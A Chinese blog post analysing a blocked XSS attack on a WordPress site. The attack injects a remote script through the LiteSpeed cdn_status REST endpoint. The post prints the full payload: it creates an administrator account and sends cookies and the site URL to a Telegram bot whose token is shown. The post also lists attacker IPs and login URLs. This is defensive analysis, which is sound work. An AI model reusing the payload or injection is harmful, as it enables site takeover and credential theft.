共计 2619 个字符,预计需要花费 7 分钟才能阅读完成。
起因
在昨天查看雷池防火墙拦截记录的时候发现了以下记录
感觉这个XSS还是比较有意思,研究一下。
请求方式
通过POST,请求WP-JSON接口,并放入XSS数据
POST /wp-json/litespeed/v1/cdn_status请求结构体如下
success=True
result[msg]=memek
result[summary]=Jembut
result[nameservers]=<script type=text/javascript src=https://wordpress.zzna.ru/css.js></script>其中nameservers部分显然含有XSS注入
查看对应内容
检查一下这个注入的内容,打开一下即可查看,代码如下,大意是通过重置Nonce的方法来创建新用户,若成功,则发送到telegram机器人。
切勿在服务器上运行这段代码
const start = async () => {
try {
// Fetch REST nonce from the specified URL
const nonceResponse = await fetch('/wp-admin/admin-ajax.php?action=rest-nonce');
// Check if the response is successful and retrieve the text
const nonce = nonceResponse.ok ? await nonceResponse.text() : null;
// If nonce is available, proceed to create a new WordPress user
if (nonce) {
const userResponse = await fetch('/wp-json/wp/v2/users', {
method: 'POST',
headers: {
'X-Wp-Nonce': nonce,
'Content-Type': 'application/json'
},
body: JSON.stringify({
username: 'admin@zzna.ru',
password: 'dacai@123',
roles: ['administrator'],
email: 'admin@zzna.ru'
})
});
// Check if the user creation was successful or encountered a server error
if (userResponse.ok || userResponse.status === 500) {
// Get cookies
const cookies = document.cookie;
// Notify about the new user creation via Telegram including cookies
await fetch('https://api.telegram.org/bot6898182997:AAGUIFwP-BsBjDpzscyJ7pLHbiUS_Cq5lNI/sendMessage', {
method: 'POST',
body: JSON.stringify({
chat_id: '686930213',
text: `URL: ${document.URL}\nNew User Created!\nCookies: ${cookies}`
}),
headers: {
'Content-Type': 'application/json'
}
});
}
}
} catch (error) {
// Handle any errors during the process
console.error(error);
return false;
}
};
// Initiate the process
start();进行安全提醒
下面这段代码去除了危险内容,提醒这位攻击者放弃攻击(会包含网站域名发送,切勿轻易尝试)
<script>
const start = async () => {
try {
// Fetch REST nonce from the specified URL
// Check if the response is successful and retrieve the text
const nonce = true;
// If nonce is available, proceed to create a new WordPress user
if (nonce) {
// Check if the user creation was successful or encountered a server error
if (true) {
// Get cookies
const cookies = 'don\'t do that';
// Notify about the new user creation via Telegram including cookies
await fetch('https://api.telegram.org/bot6898182997:AAGUIFwP-BsBjDpzscyJ7pLHbiUS_Cq5lNI/sendMessage', {
method: 'POST',
body: JSON.stringify({
chat_id: '686930213',
text: `URL: ${document.URL}\nNew User Created!\nCookies: ${cookies}`
}),
headers: {
'Content-Type': 'application/json'
}
});
}
}
} catch (error) {
// Handle any errors during the process
console.error(error);
return false;
}
};
// Initiate the process
start();
</script>可见大家建站的时候,都要注意服务器安全。
关联的风险IP
103.186.64.106(wordpress.zzna.ru服务器IP)
https://103.186.64.106:7080/login.php(Litespeed服务器登录页)
https://103.186.64.106:8090/(CYBERPANEL服务器登录页)
https://wordpress.zzna.ru/wp-login.php(用户名:admins)
https://zzna.ru/wp-login.php(用户名:admin)
103.231.248.204
84.247.116.201
89.149.24.50
正文完
这个病毒太普遍了,google上一搜索太多网站被黑了